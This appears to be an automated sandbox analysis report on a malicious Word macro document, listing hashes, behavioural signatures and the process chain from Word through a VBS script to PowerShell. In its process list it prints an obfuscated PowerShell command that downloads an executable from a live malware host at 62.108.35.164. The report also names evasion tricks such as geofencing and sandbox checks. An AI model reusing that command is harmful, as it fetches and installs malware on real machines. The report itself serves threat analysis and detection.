Analysis
- max time kernel: 87s
- max time network: 143s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 21-05-2022 12:14

- Static task: static1
- Behavioral task: behavioral1
  Sample: cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm
  Resource: win7-20220414-en
- Behavioral task: behavioral2
  Sample: cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm
  Resource: win10v2004-20220414-en
General
- Target: cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm
- Size: 89KB
- MD5: b52f6306e6c5af7bd87fab6f32a937b9
- SHA1: e7043e9907b332b9039eeb4487959d10e05d2dc0
- SHA256: cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4
- SHA512: 0f5212be7b3294cb4b86e4f884f9b750a056c34ab9d9df040481d2244659ee2c79c084747ed5cf056ae9d4d3d35563b1901dacfbec464a20ea466029916cc9cb
Malware Config
- Extracted: http://62.108.35.164/api.php
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 4004 | 3488 | explorer.exe | WINWORD.EXE
- Blocklisted process makes network request (1 IoC)
  Processes:
    flow | pid | process
    48 | 3596 | powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | WScript.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
- Delays execution with timeout.exe (1 IoC)
  Processes:
    pid | process
    1652 | timeout.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
- Modifies registry class (1 IoC)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings | explorer.exe
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes:
    pid | process
    3488 | WINWORD.EXE
    3488 | WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid | process
    3596 | powershell.exe
    3596 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 3596 | powershell.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes:
    pid | process
    3488 | WINWORD.EXE
    3488 | WINWORD.EXE
    3488 | WINWORD.EXE
    3488 | WINWORD.EXE
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes:
    description | pid | process | target process
    PID 3488 wrote to memory of 4004 | 3488 | WINWORD.EXE | explorer.exe
    PID 3488 wrote to memory of 4004 | 3488 | WINWORD.EXE | explorer.exe
    PID 100 wrote to memory of 3796 | 100 | explorer.exe | WScript.exe
    PID 100 wrote to memory of 3796 | 100 | explorer.exe | WScript.exe
    PID 3796 wrote to memory of 760 | 3796 | WScript.exe | cmd.exe
    PID 3796 wrote to memory of 760 | 3796 | WScript.exe | cmd.exe
    PID 760 wrote to memory of 3596 | 760 | cmd.exe | powershell.exe
    PID 760 wrote to memory of 3596 | 760 | cmd.exe | powershell.exe
    PID 760 wrote to memory of 1652 | 760 | cmd.exe | timeout.exe
    PID 760 wrote to memory of 1652 | 760 | cmd.exe | timeout.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\explorer.exe
    Command line: explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    - Process spawned unexpected child process
- C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\timeout.exe
        Command line: TIMEOUT /T 10
        - Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd
  Filesize: 21KB
  MD5: 197fd11428deaf8779c40b8aee37c023
  SHA1: 66d053c6349a994301ba6ec562c7e659f6e60e40
  SHA256: 7ede0b864739e9a03678ef876fb0b218b87a7d15f89b2a280989024b739deaf8
  SHA512: ab9b7ad1502532ed065bfa4bcc9e559d3a92bc9be3b46d24b1ba5a32ff7f58f7afa7431314435f434e025f36a8b4272d2a5a3ee4fbfdbeae560f809f978fcfc4
- C:\ProgramData\OIUTFuy
  Filesize: 420B
  MD5: 12a0751c89b3b618b7c91cee7a231878
  SHA1: 2d546c942a6626826dc1d76d752cb6bb67546a94
  SHA256: c9a5966dac467eaafd2848273ad734127ba965224225a7e56a02113a1af571bc
  SHA512: aab37a468a8ade701a7c21042df0bca8f58c37223dbf2709285cac863a16b98085f66bd9add1c2480cbdf86781671f1589e4f37b472398de02b1d9dde8ee5fd3
- C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
  Filesize: 81KB
  MD5: d940788959fad6d9ec52674997f04457
  SHA1: c784384517d2c206c5423a8d58dee5d9ca9c6ffb
  SHA256: 46b2da0c04f3b7edb5ab3c1280904dbc645fca003e80a3390e483bde1b80a646
  SHA512: 802359aade02f39171298dd57dec02943af22aef5105c9e8e91959b71072258b3e2eff75eda0996c04ab7704ba829ec776f1a6f9673b95cf35a860a7859d5430
- memory/760-146-0x0000000000000000-mapping.dmp
- memory/1652-151-0x0000000000000000-mapping.dmp
- memory/3488-135-0x00007FF823B00000-0x00007FF823B10000-memory.dmp (Filesize: 64KB)
- memory/3488-136-0x00007FF823B00000-0x00007FF823B10000-memory.dmp (Filesize: 64KB)
- memory/3488-137-0x000001609A390000-0x000001609A394000-memory.dmp (Filesize: 16KB)
- memory/3488-131-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp (Filesize: 64KB)
- memory/3488-130-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp (Filesize: 64KB)
- memory/3488-132-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp (Filesize: 64KB)
- memory/3488-142-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp (Filesize: 64KB)
- memory/3488-143-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp (Filesize: 64KB)
- memory/3488-144-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp (Filesize: 64KB)
- memory/3488-145-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp (Filesize: 64KB)
- memory/3488-134-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp (Filesize: 64KB)
- memory/3488-133-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp (Filesize: 64KB)
- memory/3596-149-0x0000025977970000-0x0000025977992000-memory.dmp (Filesize: 136KB)
- memory/3596-148-0x0000000000000000-mapping.dmp
- memory/3596-150-0x00007FF847690000-0x00007FF848151000-memory.dmp (Filesize: 10.8MB)
- memory/3796-140-0x0000000000000000-mapping.dmp
- memory/4004-138-0x0000000000000000-mapping.dmp